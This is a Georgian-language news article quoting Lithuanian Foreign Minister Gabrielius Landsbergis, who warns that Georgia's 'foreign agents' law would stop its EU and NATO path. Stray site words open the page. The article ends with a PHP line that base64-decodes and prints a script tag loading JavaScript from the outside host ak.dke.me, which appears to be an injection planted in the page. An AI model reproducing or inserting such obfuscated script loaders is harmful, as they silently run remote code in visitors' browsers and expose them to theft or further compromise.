celsiusi
ავერსი საქკაბელი

 ჩვენი მიზანია ძალიან ცხადი გზავნილის გაჟღერება მმართველი პარტიის წარმომადგენელთა მისამართით, პარლამენტშიც და მთავრობაშიც - რისკებისა და სერიოზული შედეგების წინაშე დადგება საქართველო თუ ისინი განაგრძობენ ამ ძალიან სახიფათო კურსით სიარულს - არ უნდა იყოს ილუზია იმის შესახებ, რომ კოსმეტიკურმა შესწორებებმა, შეიძლება ეს კანონი დემოკრატიასთან ან ევროკავშირის ნორმებთან შესაბამისი გახადოს, - ამის შესახებ ლიეტუვის საგარეო საქმეთა მინისტრმა გაბრიელიუს ლანდსბერგისმა საქართველოს პრეზიდენტთან შეხვედრის შემდეგ ერთობლივ ბრიფინგზე განაცხადა.

ლიეტუვის პირველი დიპლომატის თქმით, „უცხოური აგენტების“ კანონის მიღება, ისევე როგორც ზეწოლის გაგრძელება საქართველოს სამოქალაქო საზოგადოებაზე, შეაჩერებს საქართველოს პროგრესს ევროკავშირისა და ნატოსკენ სავალ გზაზე და თუ ეს მოხდება, პასუხისმგებლობა ცალსახად იქნება საქართველოს ხელისუფლებაზე.

„ჩვენ საქართველოში ჩამოვედით, როგორც თქვენი უახლოესი მეგობრები. მეგობრები, რომლებიც ზრუნავენ საქართველოსა და მის ხალხზე, ვინც ზრუნავს საქართველოს ევროპულ მომავალზე. უკანასკნელი კვირების განმავლობაში საქართველო კიდევ ერთხელ გამოჩნდა მედია "ჰედლაინებში", უკიდურესად საკამათო „უცხოური გავლენის შესახებ“ კანონის გამო, რომელიც გატანილ იქნა საქართველოს პარლამენტში, ასევე პროტესტის მონაწილეების წინააღმდეგ ძალის სრულიად მიუღებელი გამოყენებისა და დაშინების ორკესტრირებული კამპანიის გამო არასამთავრობო ორგანიზაციებისა აქტივისტების წინააღმდეგ, მაგრამ, ამასთან, ქართველი ხალხის მიერ ნაჩვენები აღსანიშნავი სიმტკიცის გამო, რომლის შეჩერებაც ვერ მოხდა ძალადობისა და დაშინების გზით, რომელიც შეცდომაში ვერ იქნა შეყვანილი პროპაგანდის მიერ და რომლებმაც გახადეს საკუთარი მისწრაფებები გაგონილი და დანახული კვლავ და კვლავ.

თავისუფალ სამყაროში კანონის უზენაესობა, ადამიანის უფლებები, ფუნდამენტური თავისუფლებები ისევე, როგორც სამოქალაქო საზოგადოება არის კრიტიკული აქტივი და არა ვალდებულება. მხოლოდ არადემოკრატიული რეჟიმები ხედავს ჩახშობის მექანიზმებს ძალაუფლების შენარჩუნების გზად. გულწრფელად ვიმედოვნებ, რომ საქართველო არ წავა ამ მიმართულებით. ჩვენი აქ ჩამოსვლის პირველი მზიანი არის გამოვხატოთ ჩვენი მხარდაჭერა და სოლიდარობა ყველას მიმართულებით, ვინც იბრძვის საქართველოს დემოკრატიული და ევროპული არჩევანისთვის, საქართველოს ევროპული მომავლისთვის. საქართველო ეკუთვნის ქართველ ხალხს და ის არ უნდა იქნას მიტაცებული ვინმეს მიერ. ჩვენი მეორე მიზანია ძალიან ცხადი გზავნილის გაჟღერება მმართველი პარტიის წარმომადგენელთა მისამართით, პარლამენტშიც და მთავრობაშიც - რისკებისა და სერიოზული შედეგების წინაშე დადგება საქართველო თუ ისინი განაგრძობენ ამ ძალიან სახიფათო კურსით სიარულს. საქართველომ უკვე ბევრს მიაღწია ევროინტეგრაციის გზაზე და არასდროს ყოფილა ამდენად ახლოს ევროკავშირში გაწევრიანების მოლაპარაკების გახსნასთან, როგორც ამას გასული წლის დეკემბერში მიუახლოვდა, მას შემდეგ, რაც ევროპულმა საბჭომ მიიღო გადაწყვეტილება, საქართველოსთვის კანდიდატის სტატუსი მიენიჭებინა იმ გაგებით, რომ ის გაითვალისწინებდა დარჩენილ რეკომენდაციებს. თუმცა არც წარსულის მიღწევები და არც მომავალი პერსპექტივები არ შეიძლება იქნას მიღებული როგორც მოცემულობა, ძალიან ბევრი წელი და დიდი ძალისხმევა გახდა საჭირო, თუმცა ყველაფერი შეიძლება თვალის ერთ დახამხამებაში დაიკარგოს. ჩვენი მოვალეობაა, რომ ეს ყველაფერი გითხრათ თქვენ ისე, როგორც ეს არის. ნება მომეცით, ძალიან მკაფიო ვიყო - „უცხოური აგენტების“ კანონის მიღება, ისევე როგორც ზეწოლის გაგრძელება საქართველოს სამოქალაქო საზოგადოებაზე, შეაჩერებს საქართველოს პროგრესს ევროკავშირისა და ნატოსკენ სავალ გზაზე. თუ ეს მოხდება პასუხისმგებლობა ცალსახად იქნება საქართველოს ხელისუფლებაზე. თუმცა ჯერ კიდევ არ არის დაგვიანებული. ჩვენ მოვისმინეთ საქართველოს პრეზიდენტისგან, რომ ის გეგმავს ვეტოს დადებას კანონზე და ეს იქნება გამოსავლის შესაძლებლობა ხელისუფლებისთვის, რათა გაიწვიოს ეს სამწუხარო საკანონმდებლო ინიციატივა მთლიანად. არ უნდა იყოს ილუზია იმის შესახებ, რომ კოსმეტიკურმა შესწორებებმა, შეიძლება ეს კანონი გახადოს დემოკრატიასთან ან ევროკავშირის ნორმებთან შესაბამისი. ეს კანონი არ არის თავსებადი ევროპულ არჩევანთან. არ შეიძლება იმის გამოსწორება, რაც ფუნდამენტურად გაფუჭებულია. ჩვენი გულწრფელი ინტერესია, დავეხმაროთ საქართველოს, რომ თავისი ევროპული მოგზაურობა დანიშნულების საბოლოო პუნქტამდე მიიყვანოს. საქართველო განეკუთვნება ევროპას. როგორც საქართველოს ყოფილმა პრემიერ-მინისტრმა ზურაბ ჟვანიამ თქვა თავის განცხადებაში სტრასბურგში, როდესაც საქართველო შეუერთდა ევროსაბჭოს: „მე ვარ ქართველი და მაშასა მე ვარ ევროპელი“,- და დიახ, თქვენ ხართ“,- განაცხადა ლანდსბერგისმა.

124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");